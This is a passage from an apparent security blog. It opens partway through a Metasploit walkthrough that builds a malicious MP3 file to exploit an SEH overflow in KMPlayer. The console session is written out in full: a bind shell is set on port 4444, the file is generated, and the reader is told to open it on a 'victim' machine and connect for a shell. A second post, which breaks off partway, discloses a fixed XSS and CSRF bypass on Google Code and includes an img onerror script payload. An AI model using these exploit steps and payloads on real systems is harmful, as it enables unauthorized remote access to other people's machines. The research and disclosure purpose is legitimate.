</div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-spacerun: yes;"> </span>Id<span style="mso-spacerun: yes;"> </span>Name</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-spacerun: yes;"> </span>--<span style="mso-spacerun: yes;"> </span>----</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-spacerun: yes;"> </span>0<span style="mso-spacerun: yes;"> </span>Windows XP SP3 English VMware</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><br />
</div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><br />
</div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">msf exploit(km_player_mp3_seh) > set PAYLOAD windows/shell_bind_tcp</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">PAYLOAD => windows/shell_bind_tcp</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">msf exploit(km_player_mp3_seh) > show options</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><br />
</div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">Module options (exploit/windows/fileformat/km_player_mp3_seh):</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><br />
</div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-spacerun: yes;"> </span>Name<span style="mso-spacerun: yes;"> </span>Current Setting<span style="mso-spacerun: yes;"> </span>Required<span style="mso-spacerun: yes;"> </span>Description</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-spacerun: yes;"> </span>----<span style="mso-spacerun: yes;"> </span>---------------<span style="mso-spacerun: yes;"> </span>--------<span style="mso-spacerun: yes;"> </span>-----------</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-spacerun: yes;"> </span>FILENAME<span style="mso-spacerun: yes;"> </span>msf.mp3<span style="mso-spacerun: yes;"> </span>yes<span style="mso-spacerun: yes;"> </span>mp3 file</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><br />
</div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><br />
</div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">Payload options (windows/shell_bind_tcp):</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><br />
</div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-spacerun: yes;"> </span>Name<span style="mso-spacerun: yes;"> </span>Current Setting<span style="mso-spacerun: yes;"> </span>Required<span style="mso-spacerun: yes;"> </span>Description</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-spacerun: yes;"> </span>----<span style="mso-spacerun: yes;"> </span>---------------<span style="mso-spacerun: yes;"> </span>--------<span style="mso-spacerun: yes;"> </span>-----------</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-spacerun: yes;"> </span>EXITFUNC<span style="mso-spacerun: yes;"> </span>process<span style="mso-spacerun: yes;"> </span>yes<span style="mso-spacerun: yes;"> </span>Exit technique: seh, thread, process, none</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-spacerun: yes;"> </span>LPORT<span style="mso-spacerun: yes;"> </span>4444<span style="mso-spacerun: yes;"> </span>yes<span style="mso-spacerun: yes;"> </span>The listen port</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-spacerun: yes;"> </span>RHOST<span style="mso-spacerun: yes;"> </span>no<span style="mso-spacerun: yes;"> </span>The target address</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><br />
</div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><br />
</div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">Exploit target:</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><br />
</div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-spacerun: yes;"> </span>Id<span style="mso-spacerun: yes;"> </span>Name</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-spacerun: yes;"> </span>--<span style="mso-spacerun: yes;"> </span>----</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-spacerun: yes;"> </span>0<span style="mso-spacerun: yes;"> </span>Windows XP SP3 English VMware</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><br />
</div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><br />
</div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">msf exploit(km_player_mp3_seh) > exploit</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><br />
</div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">[*] Creating 'msf.mp3' file ...</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">[*] Writing payload to file</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">[*] Generated output file /root/.msf3/data/exploits/msf.mp3</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">msf exploit(km_player_mp3_seh) ></span><span style="font-family: "Times New Roman","serif"; font-size: 8.0pt;"></span></div><div class="MsoNormal"><br />
</div><div class="MsoNormal" style="text-align: justify; text-indent: 0in;">The file named ‘msf.mp3’ is created at <span style="background: #BFBFBF; font-family: "Courier New"; font-size: 8.0pt; mso-shading-themecolor: background1; mso-shading-themeshade: 191;">/root/.msf3/data/exploits/msf.mp3</span>. Copy this file on victim machine, open it in KMPlayer. The application didn’t crash but the SEH has been exploited and the victim machine will listen on port 4444 on which when connected will spawn a shell.</div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-sShNZJTysDQ/Tgwo37GCQfI/AAAAAAAAAVw/Kmu2m9nrWs4/s1600/shell.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="163" src="http://3.bp.blogspot.com/-sShNZJTysDQ/Tgwo37GCQfI/AAAAAAAAAVw/Kmu2m9nrWs4/s400/shell.jpg" width="400" /></a></div><div class="MsoNormal" style="text-align: justify; text-indent: 0in;"><br />
</div><div class="separator" style="clear: both; text-align: center;"></div><span style="font-family: "Calibri","sans-serif"; font-size: 11pt;"></span><br />
<span style="font-family: "Calibri","sans-serif"; font-size: 11pt;"> </span><!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:TrackMoves/> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:DoNotPromoteQF/> <w:LidThemeOther>EN-US</w:LidThemeOther> <w:LidThemeAsian>X-NONE</w:LidThemeAsian> <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript> <w:Compatibility> <w:BreakWrappedTables/> <w:SnapToGridInCell/> <w:WrapTextWithPunct/> <w:UseAsianBreakRules/> <w:DontGrowAutofit/> <w:SplitPgBreakAndParaMark/> <w:DontVertAlignCellWithSp/> <w:DontBreakConstrainedForcedTables/> <w:DontVertAlignInTxbx/> <w:Word11KerningPairs/> <w:CachedColBalance/> </w:Compatibility> <m:mathPr> <m:mathFont m:val="Cambria Math"/> <m:brkBin m:val="before"/> <m:brkBinSub m:val="--"/> <m:smallFrac m:val="off"/> <m:dispDef/> <m:lMargin m:val="0"/> <m:rMargin m:val="0"/> <m:defJc m:val="centerGroup"/> <m:wrapIndent m:val="1440"/> <m:intLim m:val="subSup"/> <m:naryLim m:val="undOvr"/> </m:mathPr></w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267"> <w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/> <w:LsdException Locked="false" Priority="9" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/> <w:LsdException Locked="false" Priority="39" Name="toc 1"/> <w:LsdException Locked="false" Priority="39" Name="toc 2"/> <w:LsdException Locked="false" Priority="39" Name="toc 3"/> <w:LsdException Locked="false" Priority="39" Name="toc 4"/> <w:LsdException Locked="false" Priority="39" Name="toc 5"/> <w:LsdException Locked="false" Priority="39" Name="toc 6"/> <w:LsdException Locked="false" Priority="39" Name="toc 7"/> <w:LsdException Locked="false" Priority="39" Name="toc 8"/> <w:LsdException Locked="false" Priority="39" Name="toc 9"/> <w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/> <w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/> <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/> <w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/> <w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/> <w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/> <w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/> <w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/> <w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/> <w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/> <w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/> <w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/> <w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/> <w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/> <w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/> <w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/> <w:LsdException Locked="false" Priority="37" Name="Bibliography"/> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/> </w:LatentStyles> </xml><![endif]--><!--[if gte mso 10]> <style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-qformat:yes;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin-top:0in;
mso-para-margin-right:0in;
mso-para-margin-bottom:10.0pt;
mso-para-margin-left:0in;
line-height:115%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;}
</style> <![endif]--> <br />
<div class="MsoNormal" style="text-align: justify; text-indent: 0in;">Connect to the victim machine on port 4444 & Game Over!!!</div><br />
<div class="MsoNormal" style="text-align: justify;"></div><div class="MsoNormal" style="text-align: justify;"><span style="font-family: "Calibri","sans-serif"; font-size: 11pt;"></span></div>AMol NAikhttp://www.blogger.com/profile/03701068634043898539noreply@blogger.com13tag:blogger.com,1999:blog-1544325078740292092.post-80489122525456969712011-05-29T23:20:00.000-07:002011-05-29T23:25:23.829-07:00CSRF Protection bypass with XSS in Google Code<div dir="ltr" style="text-align: left;" trbidi="on">In my earlier post, I discussed the “Self-Only” XSS exploitation in Google Code. Today I’m going to discuss about how I was able to bypass CSRF protection using XSS vulnerability in Google Code. The attacker was able to delete the projects of authenticated victim from Google Code Project Hosting Server. As this bug has been fixed by Google, I’m disclosing it here.<br />
<br />
<b>Cross-site Scripting Vulnerability:</b><br />
<br />
Google Code hosts the example codes for the various APIs used by other applications. One of them is Google Books Search API. The vulnerable page is at <br />
<a href="http://code.google.com/apis/books/docs/viewer/examples/book-dataapi-titlesearch.html">http://code.google.com/apis/books/docs/viewer/examples/book-dataapi-titlesearch.html</a><br />
<br />
This page shows the embedded book that matched the search term.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-3qmy4y085wU/TeM0J-ZlFHI/AAAAAAAAAR4/3lNhi_b6ZGo/s1600/vulnerable-page.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="http://2.bp.blogspot.com/-3qmy4y085wU/TeM0J-ZlFHI/AAAAAAAAAR4/3lNhi_b6ZGo/s320/vulnerable-page.JPG" width="320" /></a></div><br />
<div class="separator" style="clear: both; text-align: center;"></div>When a book is requested, the page makes a JSON request by using Google Books Data API call and displays first matched result in embedded viewer. The problem is while processing the request; the page outputs the user query on page in message.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-2duaJzEQ2FY/TeM0UeGmaVI/AAAAAAAAAR8/96nAiyy4jtM/s1600/vulnerable-page1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="109" src="http://4.bp.blogspot.com/-2duaJzEQ2FY/TeM0UeGmaVI/AAAAAAAAAR8/96nAiyy4jtM/s320/vulnerable-page1.JPG" width="320" /></a></div><br />
So when requested for book “<span style="background-color: #999999;"><img src=1 onerror=’alert(document.domain)’</span>>”, due to lack of data sanitization when outputting the data back to page, the page executed the malicious JavaScript and becomes vulnerable to cross-site scripting.<br />
<br />
